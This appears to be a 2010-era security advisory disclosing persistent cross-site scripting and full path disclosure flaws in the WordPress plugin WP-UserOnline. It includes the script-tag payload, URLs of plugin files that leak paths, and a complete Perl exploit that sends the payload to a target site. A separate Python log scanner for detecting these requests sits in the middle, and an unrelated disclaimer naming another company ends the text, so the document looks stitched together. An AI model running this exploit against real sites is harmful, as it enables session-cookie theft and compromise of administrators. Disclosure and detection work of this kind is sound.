In 2010 I disclosed multiple vulnerabilities (Cross-Site Scripting and
Full path disclosure) in the WordPress plugin WP-UserOnline.
Recently I disclosed the exploit for the persistent XSS vulnerability in WP-UserOnline.
It should be of interest to those who want to test this vulnerability.
Exploit:
http://websecurity.com.ua/uploads/2012/WP-UserOnline.txt
I developed this Perl exploit on 26.04.2010.
As I wrote earlier, WP-UserOnline 2.62 and previous
versions are vulnerable. After I informed him, the developer released WP-UserOnline 2.70 (on
07.05.2010). In version 2.70 he fixed the XSS, but not the Full path disclosure
vulnerabilities.
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Past Vulnerabilities
Hello 3APA3A!
I am informing you of the Cross-Site Scripting and Full path disclosure vulnerabilities that I found in the WP-UserOnline plugin for WordPress.
XSS:
An XSS attack can be carried out with a special request to the site. To do this, a GET request must be sent in a special way (not with a browser) to the page http://site/?<script>alert(document.cookie)</script>.
This is a persistent XSS. The vulnerability appears on the page http://site/wp-admin/index.php?page=wp-useronline.
Full path disclosure:
http://site/wp-content/plugins/wp-useronline/admin.php
http://site/wp-content/plugins/wp-useronline/widget.php
http://site/wp-content/plugins/wp-useronline/wp-stats.php
http://site/wp-content/plugins/wp-useronline/wp-useronline.php
http://site/wp-content/plugins/wp-useronline/scb/Widget.php
http://site/wp-content/plugins/wp-useronline/scb/load.php
WP-UserOnline 2.62 and previous versions are vulnerable. In WP-UserOnline 2.70 the author fixed the XSS, but not the Full path disclosure vulnerabilities.
More information about these vulnerabilities is on my site:
http://websecurity.com.ua/4177/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
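A defender-side check for the requests described above, added here as an example (it is not part of the original post or of the plugin): it scans access-log lines in combined log format for request targets carrying script markup and for direct requests to the plugin files listed under Full path disclosure. The sample log lines, function names and finding labels are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Plugin files the advisory lists under "Full path disclosure".
FPD_PATHS = {"/wp-content/plugins/wp-useronline/" + name for name in (
    "admin.php", "widget.php", "wp-stats.php", "wp-useronline.php",
    "scb/Widget.php", "scb/load.php")}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.*?) HTTP/\d\.\d"')
SCRIPT_RE = re.compile(r"<\s*/?\s*script", re.IGNORECASE)

def classify(line):
    """Return finding labels (constructed names) for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = m.group("target")
    findings = []
    # The advisory says the request is sent without a browser; a client that
    # does not percent-encode the URL leaves < and > raw in the request line.
    if "<" in target or ">" in target:
        findings.append("raw-angle-brackets")
    # Decode twice so single- and double-encoded markup is also caught.
    if SCRIPT_RE.search(unquote(unquote(target))):
        findings.append("script-tag")
    # Direct request to one of the plugin files named in the advisory.
    if unquote(target.split("?", 1)[0]) in FPD_PATHS:
        findings.append("direct-plugin-file")
    return findings

def scan(lines):
    """Return (line number, findings) for every line with at least one finding."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample entries (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Apr/2010:10:00:01 +0000] "GET /?<script>alert(document.cookie)</script> HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [26/Apr/2010:10:00:09 +0000] "GET /wp-content/plugins/wp-useronline/scb/load.php HTTP/1.1" 200 310 "-" "-"',
    '203.0.113.9 - - [26/Apr/2010:10:02:30 +0000] "GET /?s=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4800 "-" "-"',
    '203.0.113.20 - - [26/Apr/2010:10:03:00 +0000] "GET /?p=42 HTTP/1.1" 200 7311 "-" "-"',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG):
        print(n, findings)
```

On a site running WP-UserOnline 2.62 or earlier, a "script-tag" hit means the stored entries shown on the wp-useronline admin page should be reviewed, since the XSS is persistent.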
#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;
my ($host,$sock,$content,$response);
$url =~ /http:\/\/(.+)\/?/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
    print "The Socket: $!\n";
    exit();
}
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
    $content .= $_;
}
print "$url - ";
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
    $response = $1;
}
if ($response == 200 or $response == 400) {
    print "OK\n";
}
else {
    print "Error: $response\n";
}
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information